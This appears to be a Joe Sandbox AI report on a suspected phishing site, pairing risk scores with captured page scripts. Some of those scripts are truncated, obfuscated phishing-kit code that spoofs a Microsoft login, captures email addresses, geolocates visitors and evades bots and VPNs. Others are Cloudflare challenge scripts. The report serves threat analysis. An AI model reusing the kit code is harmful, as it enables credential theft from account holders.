| URL: https://enrollmentportal.borlsfx.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://enrollmentportal.borlsfx.com |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code. While the script may have some legitimate functionality, the overall risk level is high due to the presence of these malicious indicators."
} |
(function(_0x254620,_0xf9497b){const _0x520f86=_0x254620();function _0xefca25(_0x4dee07,_0x25f4c7,_0xda52c2,_0x473d2d){return _0x156c(_0xda52c2- -0x15c,_0x4dee07);}function _0x3ba1bc(_0x46cc29,_0xf4d978,_0x1ae16e,_0xd317a3){return _0x156c(_0x1ae16e- -0x11e,_0xf4d978);}while(!![]){try{const _0x4535a5=-parseInt(_0x3ba1bc(0x34,0x22,0x2c,0x1e))/(-0x731*-0x1+-0x1265+-0x13*-0x97)+-parseInt(_0xefca25(-0x1e,-0x22,-0xf,-0x1f))/(-0x1*-0x5b9+-0x42e*0x3+0x6d3)+-parseInt(_0xefca25(0x0,-0x26,-0x4,-0x1a))/(-0x2*0xf4f+-0x1b18+0x83f*0x7)+-parseInt(_0x3ba1bc(0x9,-0x7,0x1e,0x8))/(-0x1a5*-0x3+-0x1*-0x15c5+-0x1ab0)+-parseInt(_0x3ba1bc(0x93,0x88,0x65,0x87))/(-0x269+-0x161b*-0x1+-0x13ad)+-parseInt(_0xefca25(0x1e,-0x24,0x8,0x6))/(0xb5*-0x1+0x20da+-0x201f)+parseInt(_0x3ba1bc(-0x3,0x3e,0x1b,0xe))/(-0xaba*0x1+0x226b+-0x1d2*0xd);if(_0x4535a5===_0xf9497b)break;else _0x520f86['push'](_0x520f86['shift']());}catch(_0x2a0ad6){_0x520f86['push'](_0x520f86['shift']());}}}(_0x1cb9,0x1*-0x1ccf81+-0x124063+0x3df3f0));function _0x156c(_0x2f3a35,_0x16a8a0){const _0x3d19d4=_0x1cb9();return _0x156c=function(_0x21acea,_0x5cc01f){_0x21acea=_0x21acea-(0x1*0xf3f+-0x1*0x1e47+-0x567*-0x3);let _0x11b2fe=_0x3d19d4[_0x21acea];if(_0x156c['YFVNED']===undefined){var _0xbef711=function(_0x5ea653){const _0x586786='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x17cdf9='',_0x2b8316='',_0x4815ad=_0x17cdf9+_0xbef711;for(let _0xb3dd45=0x14ce+-0x1*0x259a+-0x32*-0x56,_0x4a65b3,_0xd70357,_0x35153d=-0x23c3+-0x65b+0x2a1e;_0xd70357=_0x5ea653['charAt'](_0x35153d++);~_0xd70357&&(_0x4a65b3=_0xb3dd45%(0x19d8*0x1+-0x2707+0xd33)?_0x4a65b3*(0x30a+-0x267d+0x23b3)+_0xd70357:_0xd70357,_0xb3dd45++%(0x1cfa+-0x50*0x52+-0x2*0x1ab))?_0x17cdf9+=_0x4815ad['charCodeAt'](_0x35153d+(-0x1634+0x1d7a+-0x73c))-(-0x20ae+0x1948+0x770)!==-0x172*-0x17+0x1852+0x1cc8*-0x2?String['fromCharCode'](-0x21ec+0x2*0x946+0x17d*0xb&_0x4a65b3>>(-(-0x8*0x1ba+-0x361+0x103*0x11)*_0xb3dd45&-0x382+0x1*-0x2f9+-0x1*-0x681)):_0xb3dd45:0x16e0+-0xa62+-0x7b*0x1a){_0xd70357=_0x586786['indexOf'](_0xd70357);}for(let _0x41ab0=-0x4*0x1cb+0x4*0x513+-0xd20,_0x529229=_0x17cdf9['length'];_0x41ab0<_0x529229;_0x41ab0++){_0x2b8316+='%'+('00'+_0x17cdf9['charCodeAt'](_0x41ab0)['toString'](-0x22b4+-0xf73+-0xf*-0x359))['slice'](-(0x14*-0x10a+0x511+0xfb9));}return decodeURIComponent(_0x2b8316);};_0x156c['MhOPaY']=_0xbef711,_0x2f3a35=arguments,_0x156c['YFVNED']=!![];}const _0x29bfe2=_0x3d19d4[-0x15ea+0x726*0x4+-0x2d*0x26],_0x4fa678=_0x21acea+_0x29bfe2,_0x4b1202=_0x2f3a35[_0x4fa678];if(!_0x4b1202){const _0x4c9407=function(_0x3395e8){this['OiIKCb']=_0x3395e8,this['LgElwl']=[0x2*-0xb50+0x1fb9+-0x918,0xcd1+-0x1*0x21a0+0x14cf,-0x2*-0xa9f+0x2e1*0x1+-0xf7*0x19],this['IHZWlo']=function(){return'newState';},this['AjOvXE']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['ahMLVd']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x4c9407['prototype']['hrYWWW']=function(){const _0x172698=new RegExp(this['AjOvXE']+this['ahMLVd']),_0x5ed142=_0x172698['test'](this['IHZWlo']['toString']())?--this['LgElwl'][-0x27b*0x4+-0x1f*0xc9+0x2244]:--this['LgElwl'][0x1*0xf44+-0xe57+-0xed];return this['NuZUYJ'](_0x5ed142);},_0x4c9407['prototype']['NuZUYJ']=function(_0x4d4820){if(!Boolean(~_0x4d4820))return _0x4d4820;return this['RKYxCq'](this['OiIKCb']);},_0x4c9407['prototype']['RKYxCq']=function(_0x4aadf8){for(let _0xd046e2=0x2504+0x6bd*0x3+-0x393b*0x1,_0x4850ad=this['LgElwl']['length'];_0xd046e2<_0x4850ad;_0xd046e2++){this['LgElwl']['push'](Math['round'](Math['random']())),_0x4850ad=this['LgElwl']['length'];}return _0x4aadf8(this['LgElwl'][-0x1a2f*-0x1+0x24bb+-0x3eea]);},new _0x4c9407(_0x156c)['hrYWWW'](),_0x11b2fe=_0x156c['MhOPaY'](_0x11b2fe),_0x2f3a35[_0x4fa678]=_0x11b2fe;}else _0x11b2fe=_0x4b1202;return _0x11b2fe;},_0x156c(_0x2f3a35,_0x16a8a0);}const _0x4f4b8f=(function(){const _0x30aea5={};_0x30aea5['oiCKX']=function(_0x2f5e25,_0x2993e6){return _0x2f5e25===_0x2993e6;};function _0xb5ca78(_0x23f6cf,_0x2ba99b,_0x5eb24,_0x4a4b7e){return _0x156c(_0x5eb24-0x1ba,_0x4a4b7e);}_0x30aea |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b... Model: Joe Sandbox AI | {
"risk_score": 8,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the script, suggests this is a highly suspicious and potentially malicious piece of code."
} |
(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8f38226b2e834414',t:'MTczNDQ1MTMxNC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();
|
| URL: https://challenges.cloudflare.com/turnstile/v0/b/7... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any clear indicators of malicious intent, the use of dynamic code execution, external data transmission, and aggressive DOM manipulation warrant further review. Additionally, the presence of obfuscated code and the use of multiple fallback domains increase the overall risk profile of the script. Overall, this script requires closer inspection to determine its true purpose and potential impact on user security and privacy."
} |
"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Sr(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function jt(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function zt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function Gt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 7:p=n.ops.pop(),n.trys.pop();continue;default:if(u=n.trys,!(u=u.length>0&&u[u.length-1])&&(p[0]===6||p[0]===2)){n=0;continue}if(p[0]===3&&(!u||p[1]>u[0]&&p[1]<u[3])){n.label=p[1];break}if(p[0]===6&&n.label<u[1]){n.label=u[1],u=p;break}if(u&&n.label<u[2]){n.label=u[2],n.ops.push(p);break}u[2]&&n.ops.pop(),n.trys.pop();continue}p=r.call(e,n)}catch(E){p=[6,E],c=0}finally{o=u=0}if(p[0]&5)throw p[1];return{value:p[0]?p[1]:void 0,done:!0}}}var Xt={code:200500,internalRepr:"iframe_load_err",public:!0,retryable:!1,description:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(j||(j={}));var L;(fun |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. The script does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to malicious domains. It primarily handles communication between the challenge widget and the parent window, which is a legitimate use case. While the script uses some legacy practices like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, the script seems to be a benign implementation of a Cloudflare challenge, and the risk score is low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '9f4ou',
chlApiSitekey: '0x4AAAAAAA2NEz0HHMhsdZW9',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: '.gU3T7F2jTaZ6gacWMQaVx0qj9_MsHBga7NzTKIMPFw-1734451320-1.3.1.1-k3ORiUEYLNbYGFGhrLwZcWeKvbAf0no96rec4fsYEb8',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8f382291392441bd',
cH: 'm0qhIkXYyyo7o3iYmAL_kvCYAYRgmHC_gUZsSPoWg.M-1734451320-1.1.1.1-pA7LZPSz4jXPR_fROB_C6ZZwSpyCupipnZZz.Ga8I0wBT7MOv5fJMMcxp6YTVMdJ',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'SrIe0DE6EPfeghIFNfe_tLn7n.MMr8Z5PrvupMrUdSw-1734451320-1.1.1.1-W8AgmxWQugHefTMPjvnAZGLPo4DeWiSoDCn_x1_.3IRaEAWyOAJnfDCD.1BX41MPbSg.L9NwnklzKiHC0x_19zBmNKnSCqXpwqL8GA6RAsEDPE9vfUnCqjyFW4CXedLBWLoBUkG4Mlp_5vZiCjARZu.yk56vlcPV.2AC7iLZVXVxB.LxEb.JFQ.fKK6E.i.215q7fBQn4lM5N0r3IAsNMAsqIvnwGH208DCZ05B3QiiB2BfbL.r.tJkybk8f7kYrenME4KCoHAx3t3dcArIrLt4HADAi16bwv970nl2K4v.o1lAE584Ji5dhASGh0vch78iM7eDUAxFn.HtZDneldi_FLUzdE7x0oqevOOnun5XDZJSvqNhxAoMl.22O4lZl2VJt_XmeSEK6S9JLm54AAXuOxCJM7ZFLhnlk18laNmdRBbWfXMa1bg8g8OhDHe9nNt5rX9Qxn2apg21o0ZM2LqZqHDn.3RR3rbiPYnxMaojAFXGzgtkgdVQMc5CtWNqXoVhZ5GLoJ.8sGAtfyzwMcx3xpV2hJMR3Wfwa6wjXN2S2mNYKRCMaPMRxVs3ghvDRU0UjNTnp.ZL3oFNx22Zx_cyHJUyeYN05Yhk54XvvyrT1CLxAcVGiNSAGoiW15Ex47b6wXnyJ7pnmBoXj2mbeZ6f2K.BNwqAoyf35nX9JZXmiGB9pYuxPRidRyXtV0CrMXBBKmlCExAb8JrWxqi8WhBRaoyX1HLgw74yWLU6PfsRbUAQu9VrKFNiF7E6FrhqOvAvFtW4ssjBZgoTb3r_wcD8quabFl3afxIkqyOwxQeNe2KZWXuWg_vkx2YecztsjEuJOk5lD0178DjXAwaTcXzO_jvOGDLlw.ePpXBholcDCSI14o7lBqZyUgCXE_uD7xbpTb.cCDSsjVJoD1S5zF9zikV_JQjQfdEWSXPa7Q5ph2lc8C4Nf1OMX3BSpO_HegYG1l9_ug5sRMGKV7qEhzcDe5vNOKb4fEiiFo8Ij8hyesAuCbbbGD7u8vqUA4FqTohVPSs197I5bomzE0lTFFXM6YaEbLD1zHW0MgckwXsOi13rUC19o7TvWh11zqUHqerGDZ5317P0w4RKObr1iU2ybnel7KTX1DEp2Rdn3WEK7rzGUNWmSztL.vntrDOxJBuYZRGP38V5PccgB1zHPVoxL_QRBs_zT08yNQEG.aKO3hNaTu_UaRbbR4fbEdacv9Bj1uak7p8jKO4q7iBuHXGR0y.qZ0VAE5qJQ.lfo3f0cpqG1DH3DW0028u1km0em5r.UJ7gqxbJJfrexRbRDSqBfH_1lLK5bNKrHrd0LfR7ypgEqG0QFlBLFFc46WMe1V5B_sWMwoHQKr_yJG.HwUJkbTWyYvpk.ewwbo_it8NjPoR0fSD.w.gZP4glHvVSE2U0w20G_gmJnjWSyn9PYPQ',
cITimeS: '1734451320',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '9f4ou',
nextRcV: '.gU3T7F2jTaZ6gacWMQaVx0qj9_MsHBga7NzTKIMPFw-1734451320-1.3.1.1-k3ORiUEYLNbYGFGhrLwZcWeKvbAf0no96rec4fsYEb8',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://enrollmentportal.borlsfx.com/2e1145bcea/st... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. While some of the functionality may be legitimate (e.g., analytics, error reporting), the overall level of suspicious activity is concerning and requires further investigation."
}
The key reasons for the high-risk score are:
1. **Dynamic Code Execution (3 points):** The script uses heavily obfuscated code, which could potentially execute remote or dynamic code via techniques like `eval()` or the `Function` constructor.
2. **Data Exfiltration (3 points):** The script appears to be sending user data (e.g., device information, email, location) to external domains, which could be a sign of data exfiltration.
3. **Obfuscated Code/URLs (3 points):** The script is heavily obfuscated, making it difficult to understand the true intent and functionality.
While the script may have some legitimate use cases, such as analytics or error reporting, the overall level of suspicious behavior outweighs any potential benign functionality. The combination of high-risk indicators suggests that this script requires further investigation and should be treated with caution. |
function _0xe53c(_0x2dcf91,_0x13971e){const _0x11d5ef=_0x11d5();return _0xe53c=function(_0xe53ca8,_0x2a919c){_0xe53ca8=_0xe53ca8-0x1b8;let _0x5b3903=_0x11d5ef[_0xe53ca8];return _0x5b3903;},_0xe53c(_0x2dcf91,_0x13971e);}function _0x11d5(){const _0x2916dc=['backgroundImage','report','value','1681180kEhPkx','getBased','then','back','invisible','device','will\x20submit','charCodeAt','getDomain','forEach','.device','botDetected','detach','items','string','unknown\x20browser','decode','getElementsByName','4708218BvhGdv','submit','none','119PFTeMP','decodeBased','\x27\x20occured\x20at\x20\x27','removeChild','#igp','Error\x20\x27','url(','floor','arrayBuffer','reason','trim','https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ea19b2112f4dfd8e90b4505ef7dcb4f9.png','POST','getUser','getEmail','branding\x20url\x20not\x20defined','Loading...','parse','16aVgExK','<i\x20class=\x22far\x20fa-calendar-alt\x20icon\x22></i>','failure','object','split','11tYnrdT','pow','.browser','type','src','push','apply','prototype','Secured','browser','join','Failed\x20to\x20\x27setBrand\x27','display','email','662410MobuNF','name','15294690GkhoQT','country_name','replace','toDateString','done','createElement','form','search','application/octet-stream','cors','domain-field','addEventListener','add','querySelector','onloadTurnstileCallback','getElementById','render','toStringTag','Module','style','match','city','851048JghHzF','timeStamp','next','https://ipapi.co/json/','2CeJFnb','length','\x27value\x27\x20not\x20given\x20to\x20hex\x20encode','hidden','success','Form\x20not\x20given','omit','innerHTML','fromCharCode','classList','map','get','secure','encode','throw','text-content','childNodes','<i\x20class=\x22fab\x20fa-internet-explorer\x20icon\x22></i>','input','35852770HqOXGd','toLocaleTimeString','Bad\x20base64','substring','load-text','defineProperty','hasOwnProperty','append','test','log','file','.location','hex',"{\"gsk\": \"\", \"csk\": \"0x4AAAAAAA2NEz0HHMhsdZW9\", \"domain\": \"login.microsoftonline.com\", \"bg\": \"\", \"eparam\": \"2a6p5,91d04,c5787\", \"isBot\": false, \"emailAlways\": true, \"setBrand\": true, \"brandingUrl\": \"/11c639d16a\", \"reportUrl\": \"/eb076a2412\"}",'You\x20were\x20blocked,\x20please\x20put\x20off\x20your\x20vpn\x20and\x20try\x20again','toString','catch','random','unknown\x20device','files','9864090ckBfDc','userAgent','slice','Unknown\x20type\x20given','includes','innerText','logo','padStart','body','emailError'];_0x11d5=function(){return _0x2916dc;};return _0x11d5();}(function(_0x26d13b,_0xa608bb){const _0x56442b=_0xe53c,_0x1fa0d0=_0x26d13b();while(!![]){try{const _0xafe2ea=parseInt(_0x56442b(0x1e4))/0x1*(-parseInt(_0x56442b(0x218))/0x2)+parseInt(_0x56442b(0x22a))/0x3+-parseInt(_0x56442b(0x23f))/0x4*(parseInt(_0x56442b(0x1c8))/0x5)+parseInt(_0x56442b(0x20b))/0x6+parseInt(_0x56442b(0x22d))/0x7*(parseInt(_0x56442b(0x1e0))/0x8)+parseInt(_0x56442b(0x1ca))/0x9+parseInt(_0x56442b(0x1f7))/0xa*(-parseInt(_0x56442b(0x1ba))/0xb);if(_0xafe2ea===_0xa608bb)break;else _0x1fa0d0['push'](_0x1fa0d0['shift']());}catch(_0x2550e0){_0x1fa0d0['push'](_0x1fa0d0['shift']());}}}(_0x11d5,0xe1cfb),((()=>{'use strict';const _0x10835e=_0xe53c;var _0x451981={'d':(_0x4300b9,_0x3718b8)=>{for(var _0x46160d in _0x3718b8)_0x451981['o'](_0x3718b8,_0x46160d)&&!_0x451981['o'](_0x4300b9,_0x46160d)&&Object['defineProperty'](_0x4300b9,_0x46160d,{'enumerable':!0x0,'get':_0x3718b8[_0x46160d]});},'o':(_0x4a742c,_0x2e935c)=>Object[_0x10835e(0x1c1)][_0x10835e(0x1fd)]['call'](_0x4a742c,_0x2e935c),'r':_0x291354=>{const _0x3c95c4=_0x10835e;'undefined'!=typeof Symbol&&Symbol[_0x3c95c4(0x1db)]&&Object[_0x3c95c4(0x1fc)](_0x291354,Symbol[_0x3c95c4(0x1db)],{'value':_0x3c95c4(0x1dc)}),Object[_0x3c95c4(0x1fc)](_0x291354,'__esModule',{'value':!0x0});}},_0x4ab1a7={};_0x451981['r'](_0x4ab1a7),_0x451981['d'](_0x4ab1a7,{'botDetected':()=>_0x35c60a,'emailError':()=>_0x1ae036});class _0x5c8c4d{static[_0x10835e(0x203)](_0x411924){const _0x22ddd9=_0x10835e;if(!_0x411924)t |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | ```json
{
"risk_score": 3,
"reasoning": "The script appears to be related to Cloudflare's security challenges, with no high-risk behaviors such as dynamic code execution or data exfiltration. It includes encoded URLs and some obfuscation, which are moderate-risk indicators. However, the context suggests a legitimate purpose related to security challenges, capping the score at 3."
} |
window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F"},"translations":{"turnstile_feedback_description":"Send%20Feedback","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","turnstile_success":"Success%21","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","testing_only":"Testing%20only.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_timeout":"Timed%20out","turnstile_footer_terms":"Terms","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_privacy":"Privacy","human_button_text":"Verify%20you%20are%20human","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_expired":"Expired","turnstile_failure":"Error","turnstile_verifying":"Verifying...","turnstile_refresh":"Refresh","turnstile_overrun_description":"Stuck%20here%3F"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eU,eX,eZ,f0,f1,fd,fp,fv,fw,fx,fH,fS,fW,fX,g0,g1,gx,gB,gC,gG,gH,fY,fZ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(890))/1*(parseInt(gI(1346))/2)+parseInt(gI(635))/3+parseInt(gI(1579))/4*(-parseInt(gI(529))/5)+-parseInt(gI(798))/6*(-parseInt(gI(1429))/7)+parseInt(gI(1189))/8+parseInt(gI(1003))/9*(parseInt(gI(805))/10)+parseInt(gI(1853))/11*(-parseInt(gI(733))/12),d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,578003),eM=this||self,eN=eM[gJ(570)],eO=function(gK,d,e,f,g){return gK=gJ,d={'BfxAj':function(h,i){return h==i},'SVQJD':function(h,i){return h>i},'paQWg':function(h,i){return i&h},'twJxO':function(h,i){return h^i},'Racdv':function(h,i){return i^h},'plCpW':function(h,i,j){return h(i,j)},'fTcmQ':function(h,i){return h^i},'kftpy':function(h,i,j){return h(i,j)},'pLgjh':gK(489),'WbdQB':function(h,i,j){return h(i,j)},'HIrmW':function(h,i,j){return h(i,j)},'xNVEg':function(h,i){return h-i},'ySgCh':function(h,i){return h>>>i},'nBIEm':function(h,i){return h&i},'KKnlN':function(h,i){return h&i},'bkQGf':function(h,i,j){return h(i,j)},'sZubA':function(h,i,j){return h(i,j)},'QwSmI':function(h,i,j){return h(i,j)},'HDYbj':function(h,i,j){return h(i,j)},'BSeqN':function(h,i){return h!==i},'NorfS':gK(1205),'iWWMM':function(h,i){return h<i},'sjCTz':function(h,i){return h(i)},'Cgzkx':function(h,i){return h|i},'GepNw':function(h,i){return i|h},'zmCQK':function(h,i){return i&h},'wnrEO':function(h,i){return h-i},'cokbN':function(h,i){return h<i},'aQLXl':function(h,i){return h<<i},'Cwfdq':function(h,i){return i&h},'fhkNn':function(h,i){return h-i},'xqcqc':function(h,i){return h==i |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": [
"Cloudflare"
]
} |
|
| URL: https://enrollmentportal.borlsfx.com/rwrzvvwfa/d8b09a/?2a6p5=test@test.com Model: Joe Sandbox AI | {
"brands": [
